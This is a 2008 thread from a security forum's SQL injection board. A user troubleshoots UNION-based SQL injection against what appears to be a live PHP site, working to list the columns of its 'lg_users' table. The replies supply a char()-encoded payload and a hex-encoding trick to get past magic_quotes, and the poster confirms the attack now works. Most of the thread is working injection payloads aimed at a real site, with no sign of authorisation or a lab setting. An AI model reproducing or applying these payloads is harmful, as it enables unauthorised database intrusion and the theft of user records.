| 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Pb with column name |  |  
	| 
	
		|  Posted: Tue Mar 11, 2008 1:08 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Nial |  | Advanced user |  |  
  |  |  |  | Joined: Feb 29, 2008 |  | Posts: 103 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hello ! The version installed on the server is 5.0.45-Debian_1ubuntu3.1-log
 I can get table name with
 
 
  	  | Code: |  	  | &id=-1+UNION+ALL+SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+20,1--+ | 
 
 but when i want to get column name
 
 
  	  | Code: |  	  | &id=-1+UNION+ALL+SELECT+COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME='lg_users'+AND+TABLE_SCHEMA='argh'+LIMIT+0,1--+ | 
 
 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/ligue/clanprofile.php on line 14
 
 Dunno what is the problem, if i am able to list table name, why cant i list the column name?
  |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Mar 12, 2008 2:31 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| onbiew |  | Regular user |  |  
  |  |  |  | Joined: Nov 29, 2005 |  | Posts: 12 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| try with char ascii 
 &id=-1+UNION+ALL+SELECT+COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=concat(char(108),char(103),char(95),char(117),char(115),char(101),char(114),char(115))+AND+TABLE_SCHEMA=concat(char(97),char(114),char(103),char(104))+LIMIT+0,1--+
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Wed Mar 12, 2008 2:46 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| ... or use hex encoded strings "0xaabbcc...", because php "magic_quotes" feature can change "'" to "\'"  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Mar 13, 2008 1:16 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Nial |  | Advanced user |  |  
  |  |  |  | Joined: Feb 29, 2008 |  | Posts: 103 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Thx it is working now  |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |